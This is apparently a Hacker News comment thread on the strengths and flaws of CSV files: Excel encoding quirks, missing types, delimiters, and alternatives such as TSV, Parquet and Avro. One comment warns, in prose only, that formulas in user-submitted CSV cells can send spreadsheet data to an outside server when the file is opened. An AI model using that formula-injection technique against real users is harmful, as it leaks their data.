CSVs: The Good, the Bad, and the Ugly

89 pointsby goranmoominover 4 years ago

20 comments

CSVs are the worst and only option for data exchange in 99% of the cases.Most CSVs travel through excel at some point in their lives, so we need to talk about excel:Excel neither reads nor writes UTF-8 CSV files without jumping through hoops.Excel saves files in different character sets on MacOS and Windows.Excel tries to interpret fields with digits as numbers, stripping off leading 0's, etc. (think serial numbers or whatever with leading 0's)Excel will try and interpret date fields and write them out in a different format.Outside of Excel:There is no way to know what character set a CSV file is encoded in. You can only guess.UTF BOM - sometimes there, sometimes not.If the file is malformed but still opens in Excel it is a bug in your CSV parser, and not a problem with the producer of the file (so they will tell you)Most CSV libraries are extremely buggy and cannot generate CSV to spec.Most CSV libraries are extremely buggy and cannot read CSV that meets spec.Many programmers think CSV is easy and do not use a library go generate or read CSV producing even worse results than their language's buggy CSV library.The spec is just a suggestionNobody reads the specThat's just the tip of the iceberg

评论 #25017116 未加载

评论 #25015778 未加载

评论 #25015796 未加载

评论 #25015834 未加载

评论 #25015721 未加载

评论 #25015771 未加载

评论 #25015988 未加载

评论 #25022410 未加载

评论 #25023837 未加载

评论 #25019431 未加载

评论 #25016032 未加载

评论 #25015757 未加载

评论 #25017348 未加载

undecisiveover 4 years ago

I was hoping to see some mention of the security downsides of CSVs - something that as a programmer of over 10 years experience, I wasn't aware of until a couple of years ago.If you hand a CSV to a normal person, they'll open it in MS Office. Or LibreOffice.If you put a formula into any cell starting with an `=` character, the office suite will give you a terse warning about updates or something, and when you accept, it will run every formula.For example, you could write a formula to convert cells A1:D10 to params, and make a GET request to an address on your personal server. If the CSV contains user submitted data, e.g. if someone has set that formula as their name, and the CSV hasn't been carefully sanitised, then hand someone from the business your CSV to build some sort of report, they may well be sending much of the data to a 3rd party.While maybe not a CSV-specific issue, certainly CSVs are believed to be safe (it's just a text file! We're only using it internally!) They really are not safe, and it sometimes takes a non-trivial amount of work to make them safe.

评论 #25015735 未加载

评论 #25015765 未加载

ravover 4 years ago

<pre><code> Line-delimited JSON works, but imposes a high size overhead (field names are repeated for every record) and is not well supported in non-programming environments. </code></pre> The article only discussed line-delimited JSON objects. How about line-delimited JSON arrays? You put the field names in an array on the first line, and the values in arrays on the subsequent lines.Although in my day-to-day, the overhead of field names is rarely problematic.

评论 #25015589 未加载

评论 #25022066 未加载

评论 #25015592 未加载

captrbover 4 years ago

"Parquet files work well, but streaming is a tad more complex (you need to be able to seek to the end of the file to read the metadata before you can stream the contents)"I didn't realize that all the metadata in Parquet was stored at the end. That is indeed unfortunate for streaming use cases. Especially sad because columnar dictionary formats can offer great compaction for some data. I've been achieving 20x+ size redutions by converting from CSV to Parquet.

评论 #25020972 未加载

评论 #25016779 未加载

chubotover 4 years ago

Ultimately there’s no format that corrects all of CSVs flaws while retaining its benefits.I'm planning to fix this with <a href="https://www.oilshell.org/" rel="nofollow">https://www.oilshell.org/</a> !Eliminating the need for ad hoc parsing and splitting is one of the Four Features That Justify a New Unix Shell: <a href="http://www.oilshell.org/blog/2020/10/osh-features.html" rel="nofollow">http://www.oilshell.org/blog/2020/10/osh-features.html</a>I've designed a format called QTSV (quoted TSV) which lets you embed newlines and tabs in fields. It's built on QSN (quoted string notation), which are essentially just Rust string literals:<a href="http://www.oilshell.org/release/latest/doc/qsn.html" rel="nofollow">http://www.oilshell.org/release/latest/doc/qsn.html</a>QSN is fully implemented, but QTSV isn't done yet. Proposal here:<a href="https://github.com/oilshell/oil/wiki/TSV2-Proposal" rel="nofollow">https://github.com/oilshell/oil/wiki/TSV2-Proposal</a>However the latest Oil release actually does emit QTSV! The "pp" builtin (for pretty-print) will print a QTSV file of shell function names (procs) and their doc comments (like docstrings).----If you'd like this to be a reality, contact me and help out! Useful things to do:- write a messy CSV to strict QTSV converter (it will need some flags for the heuristics, like Python's CSV library) - write a QTSV library in your language[1] <a href="https://www.oilshell.org/release/0.8.4/" rel="nofollow">https://www.oilshell.org/release/0.8.4/</a>

sharpercoderover 4 years ago

We can still decide to start to use ascii 34, 35, 36 and 37. Sure, we'll need to deal with tsv and csv backward compat. But at least we won't have any escaping problems and can do very simple parsing.

评论 #25016162 未加载

评论 #25016291 未加载

simonebrunozziover 4 years ago

Slightly tangential, but my feeling is that most people don't know where the "the good, the bad, the ugly" expression comes from.It's a "spaghetti western" movie [0], directed by Sergio Leone, released in 1966, and credited with the rise to fame for Clint Eastwood.If you have never watched it, I highly recommend it. In the genre, it is probably among the best.Music was composed by Ennio Morricone, another pillar of Italian cinema and music, who died last July. One of the theme songs for the movie, "The Ecstasy of Gold", is very famous all around the world, and even Metallica played it at some concerts. [1]Also, interesting detail from a Quora answer [2] - I wasn't aware of the locations used to film until now:> The term "spaghetti western" was used by American filmgoers and reviewers because most were produced and directed by Italian film-makers, many of them trying to copy Leone’s unique style.> Most were filmed on low budgets and shot at various locations around southern Italy and Spain. The Tabernas Desert and Cabo de Gata-Nijar were especially popular shooting locations.[0]: <a href="https://en.wikipedia.org/wiki/The_Good,_the_Bad_and_the_Ugly" rel="nofollow">https://en.wikipedia.org/wiki/The_Good,_the_Bad_and_the_Ugly</a>[1]: <a href="https://en.wikipedia.org/wiki/The_Ecstasy_of_Gold" rel="nofollow">https://en.wikipedia.org/wiki/The_Ecstasy_of_Gold</a>[2]: <a href="https://www.quora.com/Where-does-the-expression-the-good-bad-and-ugly-come-from#:~:text=The%20title%20refers%20to%20the,influential%20western%20movies%20ever%20made" rel="nofollow">https://www.quora.com/Where-does-the-expression-the-good-bad...</a>.

评论 #25017792 未加载

orevover 4 years ago

You can get away with structured formats only when everything is fully automated, which works for APIs, but anything that needs human review will almost always be opened in Excel. That rules out anything fancy like JSON. Excel supports XML, but it think most people don’t know how to use that, and I suspect it would only be useful for simple tabular data — not complex structures. Many/most business processes are not 100% automated, so you just have to fall back on something that works with standard business tools (Excel).

LukeEFover 4 years ago

Luke from TerminusDB here - we've been building automatic import and versioning features for CSVs over the last number of months. Just went into canary release actually.Agree very strongly with the benefits and problems of CSVs in the article. CSVs are crazy flexible and if you are a team with a high velocity of changes and experiments with data, then it can make your life easier to work with CSVs (versus the other options).Terminus is a straight-up open source graph database with revision control at the core. We noticed the CSV (and at best append to Git) problem when we were developing the solution. Loads of teams (irl) use CSVs + email for the storage and distribution of data (and features).What happens is:Data versioning is required but not uniformly specified or facilitated. It ends up being a suffix on a file, rather than a proper version-controlled system as is now common with Code.Data communication is undertaken by sending large files via slack or e-mail. This means multiple inconsistent versions can float around the team without any visibility to project managers, and without any assurance that what you have is the latest version.(As per the article and some comments) CSVs contain no type information, so information is routinely marshaled into and out of formats leading to extra “cleaning” time and hard to find errors (NaNs) which may not even appear in the final feature selection.Apparently 'best practice' is to put all changes back into the data warehouse, but the reality is a 'shadow data' economy within enterprise and an open CSV economy in startups. We are all about bridging those worlds. Give you a GitHub-like way to manage your CSVs so they are version controlled and give the team the ability to see who is making changes. The ability to work offline and then sync up later (like pushing in Git) is a really important aspect.Can really help with CSV problems (we know as first thing we did was shove all our CSVs into TerminusHub).

pmoriartyover 4 years ago

I never got why TSV's aren't more popular.TSV's are exactly like CSV's but only use TABs instead of commas as delimiters.This simply and elegantly solves one major issue with CSV's, which is that commas are quite common in real data. TABs, in contrast, are not.It's not perfect, but it's a simple, real-world solution that popular software packages (like Excel) which consume CSVs will readily recognize.

评论 #25015709 未加载

评论 #25020402 未加载

评论 #25015743 未加载

评论 #25015905 未加载

rattrayover 4 years ago

The worst thing, to me, mentioned in "Bad" is that CSV's are untyped, which especially makes distinguishing nulls and empty strings impossible.I wonder if a "typed csv" standard could emerge, like `.tscv` eg;<pre><code> Name::String?,ID::String,Born::Date Foo,0123,2020-01-01 \NULL,0124,2020-01-02 </code></pre> Still streamable, human-readable/editable (although not with excel et al til they are modified to open it), compact, simple.Of course, would only be useful to actual Data People for a while, so would not have ubiquity.

评论 #25016497 未加载

评论 #25023292 未加载

breckover 4 years ago

> the wrong delimiterI personally try to always generate my data as SSVs. Occasionally I'll have a need for one column with multiple words, in which case I'll make it the last column and it poses no parsing problems as I include the header always and then can just parse the last column as rest.This means you need to be restrictive on the types in your data—which I've always found helps with a lot of other things anyway. No commas, no tabs, no newlines, no quotes—none of that is allowed in a value, and then you have nice clean data ready to parse, that is URL friendly, etc.Of course, when I send my data back out into the world, need to "compile" it to CSV, as almost no one uses SSV.> CSVs have no types, everything is a string.I think this will be solved in the next 10 years or so. We'll have something that's like Schema.org meets DefiniteltyTyped. A "Common Tongue" for types, with a Wikipedia like community and an easy syntax to extend at the last mile for defining your own dialect to suit your worldview.

评论 #25016158 未加载

评论 #25020135 未加载

评论 #25020243 未加载

评论 #25020232 未加载

评论 #25022358 未加载

drejover 4 years ago

That incorrect parsing of fields wih newlines is real. Here’s a demonstration how you can essentially inject made up data into someone’s analysis if you know they will use the most popular Apache project and the de-facto standard tool for big data processing (with default settings): <a href="https://kokes.github.io/blog/2020/06/12/high-performance-data-loss.html#lesson-6-all-bets-are-off" rel="nofollow">https://kokes.github.io/blog/2020/06/12/high-performance-dat...</a>

akboover 4 years ago

You can stream AVRO records. AVRO is a well defined, binary, space efficient serialization format that can be used to serialize individual records (for streaming) or a whole set of records (for file storage). That should cover all of the authors requirements, right?More info: <a href="https://www.confluent.io/blog/avro-kafka-data/" rel="nofollow">https://www.confluent.io/blog/avro-kafka-data/</a>

framecowbirdover 4 years ago

We use CSVs a lot and a good schema for a metadata file would be very useful. Rather than making up my own, does anybody know of a good, well-adopted metadata format for CSV files? I found <a href="https://specs.frictionlessdata.io/tabular-data-package" rel="nofollow">https://specs.frictionlessdata.io/tabular-data-package</a>, but not sure how widely used it is.

评论 #25021923 未加载

ameliusover 4 years ago

If you want to know how ugly a format is, just look at all the options you have to enter correctly when you try to open it.

andi999over 4 years ago

But dont forget, there is only two kinds of decimal separators in this world, those with comma and those with dots...

评论 #25022119 未加载

neonateover 4 years ago

<a href="https://archive.is/wQQ3h" rel="nofollow">https://archive.is/wQQ3h</a>

neologover 4 years ago

I've always wondered why parquet and arrow put metadata at the end.

pachicoover 4 years ago

I though it was already a standard to treat \NULL as null in CSV parsers.

评论 #25015867 未加载

评论 #25019194 未加载

评论 #25015817 未加载